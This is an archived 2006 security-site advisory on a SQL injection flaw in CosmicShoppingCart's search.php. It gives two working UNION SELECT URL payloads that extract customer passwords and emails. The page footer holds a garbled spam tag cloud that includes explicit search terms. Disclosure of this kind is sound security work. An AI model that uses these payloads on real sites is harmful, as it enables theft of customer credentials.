about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability



2006-05-28 CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability
Rated as : Moderate Risk

Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a
fully customizable, shopping cart designed.

SQL injections have been found, they could be exploited by users to
retrieve the passwords of the admin.

Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
securitydot.net - 2006-05-28

Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 14:47:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c news for c t525t t160t daval CMS is Fre t515t www.sabita mambo Remo mambo Remo www.sexvid www.irance global ann t103t phpmychat CMS is Fre phpmychat www.srilan news for c www,porno phpmychatr FREE SEX V www,porno phpmychatr nudity Fuking pictuers s www.srilan injection netqmail vba sridavi Exploits S CMS is Fre nuke amish BLUE FILM Www.arbsex travel.sta Www.arbsex xxmovi BannerClic School gal Cover girl www.sexhot Feer. Free porn tamil sex Photo of n /search/ex yuotube.co